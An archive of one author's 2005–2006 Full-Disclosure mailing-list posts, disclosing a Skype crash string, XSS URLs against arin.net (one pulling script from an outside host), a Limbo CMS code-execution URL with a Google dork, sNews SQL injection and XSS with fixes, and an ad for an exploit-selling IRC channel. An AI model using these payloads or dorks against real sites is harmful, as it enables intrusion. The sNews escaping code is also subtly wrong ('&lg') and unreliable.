":D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D"
When the user opens the chat window with the icons skype will stop
responding and crash

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Igloo-FTP Pro Problems

2006-03-06 Thread Alexander Hristov 
As u can see at the screenshot provided below iglooftp cant work with
files that are bigger then 2gb - even the transfer of the file fails
screenshot : http://securitydot.net/iglooftp-problems.png
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Please remove me from the list

2006-03-04 Thread Alexander Hristov 
U can remove yourself from here :
https://lists.grok.org.uk/mailman/listinfo/full-disclosure

On 3/4/06, W1nd man <[EMAIL PROTECTED]> wrote:
>
>
>
> Please remove me from the list
>
>
> 
>
> Walla! Mail - get your free 3G mail today
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DSplit - Tiny AV signatures Detector

2006-03-04 Thread Alexander Hristov 
Well clamav is the best AV for no money and its very good developed
again for no money :)
On 3/4/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> and it clearly shows clamav is a crap antivirus where the tools like
> DSplit are a problem for them,
> and they will detect DSplit when they can't find a better way to
> detect virus.
>
>
>
> Alexander Hristov wrote:
> > Clamav detects it and can unrar it with the unrar module
> >
> > On 3/3/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: DSplit
> > is the small brother of an old tool known as UKsplitter wich is now
> > abandonned, does not work in vmware, fails to run under windows
> > 2003.
> >
> > DSplit has been coded for persons like me, targeted by AV firms and
> >  I'm not responsible of the bad uses of it, I recall this method is
> > known since a long time and it's up to the AV firms to review their
> > detections software.
> >
> > http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> >  http://getdsplit.class101.org
> >
> > usual critics , flames, can be directly sent to the Recycle Bin :>
> >>>
> > ___ Full-Disclosure -
> > We believe in it. Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> > sponsored by Secunia - http://secunia.com/
> >>>
> >
> >> -- Best Regards, Aleksander Hristov < root at securitydot.net > <
> >> http://securitydot.net >
> >
> >
> >
> >
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.2 (MingW32)
>
> iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX
> OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0
> gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq
> GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H
> DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m
> uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG
> 59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac
> 2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx
> 9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h
> TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb
> rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH
> RDdNjcudUuw=
> =iAHW
> -END PGP SIGNATURE-
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DSplit - Tiny AV signatures Detector

2006-03-03 Thread Alexander Hristov 
Clamav detects it and can unrar it with the unrar module

On 3/3/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> DSplit is the small brother of an old tool known as UKsplitter wich is
> now abandonned, does not work in vmware, fails to run under windows 2003.
>
> DSplit has been coded for persons like me, targeted by AV firms and
> I'm not
> responsible of the bad uses of it, I recall this method is known since
> a long time and it's up to the AV firms to review their detections
> software.
>
> http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> http://getdsplit.class101.org
>
> usual critics , flames, can be directly sent to the Recycle Bin :>
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.2 (MingW32)
>
> iQIVAwUBRAiMwa+LRXunxpxfAQKMvxAAyymzCo/aupOnqB6XFC7hK45IrbW8J+LQ
> a3oO/p/AFNMZdFUw8fo22n4N+gEeZd1iqHzYyvpuyfp4w9bvy5MXVE5SC8ZTneuN
> n3Ci6PCQGfF/b6pk+XeyJ1aZsUOjA36TIxSG+g12rERpGLmYNba3NLVUw5P0h9uS
> 6HupomFeRa1Bzf8yKTDOWhbNcaogR93hzeHgaqJoUe4sxJFiSfFZ0uC+yATBLcnB
> oNgTBIUXqpGJGpoO7+F6odgX0pn2w4xX2/xnyWEvKc2Lv9YO8sMhRGh8o6SC/q8p
> KJ+w2PaRPGcAt0PFD3XkSf1N9ntrXpx2bYrQP0DqOiRYNCPmnvBLyKkPeEvERzNc
> e+dCPw3iMC2/t1IB0DAS78ZNC7ORJv+6jc/TZ19IXYHuyfbMMrSWYaw2mJwJp71x
> 7HwGN8b58fBAVrEh7OU8WOhRb4LBNeDISIV44pY32b16rG3MamaYjEFwDs18h+TI
> 2Pjsu5Sygs1WeD1u4gx4QrCO5Pb9H8GRzYYhxauv0YijhapACNQjQE2/IJov3fOa
> uf91+aJWEBViWK/hXPBbyBznYySmDm/qs6aiz9nvUws9IK82AvdXGAAKtK1dN52L
> xjRZI1kS0YrITdyXswXnE/CFL4pHlU//PlTUNnY1WfA4jZ9Wz1OxHsNnsV3BNdNF
> 0Uu/0R6ycOo=
> =Ce/n
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Arin.net XSS

2006-03-03 Thread Alexander Hristov 
Just tested : 
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
it still works for me

On 3/3/06, Dave Korn <[EMAIL PROTECTED]> wrote:
> "Terminal Entry" <[EMAIL PROTECTED]> wrote in message
> news:[EMAIL PROTECTED]
>
> > Notification
> > Multiple attempts to contact Arin site administrators went unanswered
>
>   Looks like someone was paying at least some attention, because none of
> your examples worked when I tried them just now.
>
> > Some demonstration exploit URLs are provided:
> > http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>
> No match found for .
>
> > http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
>
> No match found for  SRC=http://maliciousCode.net/exploit.js>.
>
> [  Funnily enough it goes bold after 'SRC=' and the rest of the thing turns
> into a borken link to "http://maliciousCode.net/exploit.js>"  ]
>
> > http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>
>  No match found for .
>
> cheers,
>   DaveK
> --
> Can't think of a witty .sigline today
>
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New MSN Servers

2006-03-03 Thread Alexander Hristov 
Its really stupid to believe that msn doesnt have load balancing and
have only one server
On 3/3/06, ZeuZ <[EMAIL PROTECTED]> wrote:
> Hi everybody, yesterday I was about to update something in my MSN Space and
> I found out something... Suddenly logginet.passport.com redirected me to
> www.msn-int.com (65.54.202.62) and at first I thought it was some kinda
> spyware, so I Switched to Linux and tryed again, and again the same... So I
> decided to check out with NMAP and I found out this:
>  Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-03-04 03:03
> CET
>  DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0,
> SF: 0, TR: 1, CN: 0]
>  Initiating SYN Stealth Scan against 65.54.202.62 [1672 ports] at 03:03
>  Discovered open port 80/tcp on 65.54.202.62
>  SYN Stealth Scan Timing: About 26.67% done; ETC: 03:05 (0:01:22 remaining)
>  The SYN Stealth Scan took 102.54s to scan 1672 total ports.
>  Initiating service scan against 1 service on 65.54.202.62 at 03:05
>  The service scan took 7.10s to scan 1 service on 1 host.
>  Warning:  OS detection will be MUCH less reliable because we did not find
> at least 1 open and 1 closed TCP port
>  For OSScan assuming port 80 is open, 39518 is closed, and neither are
> firewalled
>  For OSScan assuming port 80 is open, 38324 is closed, and neither are
> firewalled
>  Insufficient responses for TCP sequencing (3), OS detection may be less
> accurate
>  For OSScan assuming port 80 is open, 41733 is closed, and neither are
> firewalled
>  Host 65.54.202.62 appears to be up ... good.
>  Interesting ports on 65.54.202.62:
>  (The 1671 ports scanned but not shown below are in state: filtered)
>  PORT   STATE SERVICE VERSION
>  80/tcp open  httpMicrosoft IIS webserver 6.0
>  Device type: firewall
>  Running (JUST GUESSING) : Netscreen ScreenOS (85%)
>  Aggressive OS guesses: Netscreen 5XP firewall+vpn (os 4.0.3r2.0) (85%)
>  No exact OS matches for host (test conditions non-ideal).
>  TCP/IP fingerprint:
> SInfo(V=4.01%P=i686-pc-linux-gnu%D=3/4%Tm=4408F60C%O=80%C=-1)
>  TSeq(Class=C%Val=1E240%IPID=Z%TS=U)
>  T1(Resp=N)
>  TSeq(Class=C%Val=1E240%IPID=Z%TS=U)
>  T1(Resp=Y%DF=Y%W=7D77%ACK=S++%Flags=AS%Ops=)
>  T2(Resp=N)
>  T1(Resp=Y%DF=Y%W=7D77%ACK=S++%Flags=AS%Ops=)
>  T2(Resp=N)
>  T3(Resp=N)
>  T2(Resp=N)
>  T3(Resp=Y%DF=Y%W=7D76%ACK=O%Flags=AS%Ops=)
>  T4(Resp=N)
>  T3(Resp=Y%DF=Y%W=7D76%ACK=O%Flags=AS%Ops=)
>  T4(Resp=N)
>  T5(Resp=N)
>  T4(Resp=N)
>  T5(Resp=N)
>  T6(Resp=N)
>  T5(Resp=N)
>  T6(Resp=N)
>  T7(Resp=Y%DF=Y%W=7D78%ACK=S++%Flags=A%Ops=)
>  T6(Resp=N)
>  T7(Resp=Y%DF=Y%W=7D78%ACK=S++%Flags=A%Ops=)
>  PU(Resp=N)
>  T7(Resp=Y%DF=Y%W=7D78%ACK=S++%Flags=A%Ops=)
>  PU(Resp=N)
>  PU(Resp=N)
>
>  TCP Sequence Prediction: Class=constant sequence number (!)
>   Difficulty=0 (Trivial joke)
>  IPID Sequence Generation: All zeros
>  Service Info: OS: Windows
>
>  Nmap finished: 1 IP address (1 host up) scanned in 140.366 seconds
> Raw packets sent: 3421 (153KB) | Rcvd: 2069 (98.1KB)
>
>
>  So, literally MSN Network is derivating space's user's data trhough some
> firewall to another host, perhaps just to  increase something in user's
> accounts...
>  I also cheked out with a traceroute of the hops it was making... Until hop
> 21 here there where no coincidence, diferent rotuers and diferent gateways
> in the process...  but then they started to center in SAAVIS (both MSN.ES
> and MSN-INT.COM)
>  Now, should this be considered as a mere Microsoft new idea or is just a
> problem that I'm having?
>  Maybe it's just me, but I want to be sure, seems like if Microsoft was
> about to change it's system network once again
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Limbo CMS code execution

2006-02-28 Thread Alexander Hristov 
Official page : http://www.limbo-cms.com/

Vulnerable : Limbo 1.*

Fix : No

Bug : 
http://somehost/path-to-limbo/index.php?option=frontpage&Itemid=system(CODE)

example : index.php?option=frontpage&Itemid=system(uname)

Google search string : inurl:"option=frontpage"

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Norton Monitoring system funny problems

2006-02-25 Thread Alexander Hristov 
Norton Internet monitoring tools issues
Versions Affected : *
Fix : No

What im writing about is how to stop the internet of some user that is
using the norton tools and IRC / any other chat at the same time.

By default norton monitor checks for words like "keylogger" , "start
keylogger" , "key logger" and etc.etc.

Example for irc :
Start a mIRC or any other IRC client that u like and connect to some server.
Type down /ctcp yournick start keylogger . By default norton monitors
your mIRC Process and your logs of it so it sees "star keylogger" and
automaticly blocks mIRC.exe from starting and automaticly blocks port
6667 or whatever port ure using to connect to IRC. Nice eh ?

Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XSS and SQL injection in sNews

2006-02-14 Thread Alexander Hristov 
Official page : http://www.solucija.com/home/snews/

XSS in comments :

just post some comment with alert('XSS TEST by
securitydot.net');

FIX : put this on 423 line
$r = str_replace ("<","<",$r);
  $r = str_replace (">","&lg",$r);

Injection through categories : index.php?category=1%20or%201=2

FIX : put this on 313 line
if (ereg('^[0-9]*$' , $category))

Injection through id : index.php?id=0%20or%201=2

FIX : put this on 175 line
if (ereg('^[0-9]*$' , $id)) {

--
Securitydot.net
joffer and DrFrancky
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XSS and SQL injection in sNews

2006-02-14 Thread Alexander Hristov 
Official page : http://www.solucija.com/home/snews/

XSS in comments :

just post some comment with alert('XSS TEST by
securitydot.net');

FIX : put this on 423 line
$r = str_replace ("<","<",$r);
   $r = str_replace (">","&lg",$r);

Injection through categories : index.php?category=1%20or%201=2

FIX : put this on 313 line
if (ereg('^[0-9]*$' , $category))

Injection through id : index.php?id=0%20or%201=2

FIX : put this on 175 line
if (ereg('^[0-9]*$' , $id)) {

--
Securitydot.net
joffer and DrFrancky
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Exploits Selling / Buying

2005-06-06 Thread Alexander Hristov 
Hello list,

We would like to announce a new service to the security community at
securityfocus ,
its about buying new,private exploits.
So if you are looking to profit from your findings - the place is
irc.exploits.cx the main chan is #exploits , details can be found on
the /motd or you could just ask in the main channel.

Our IRC network also supports ssl - irc.exploits.cx port: 


We're looking forward to see you online!


best regards,
exploits.cx staff
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/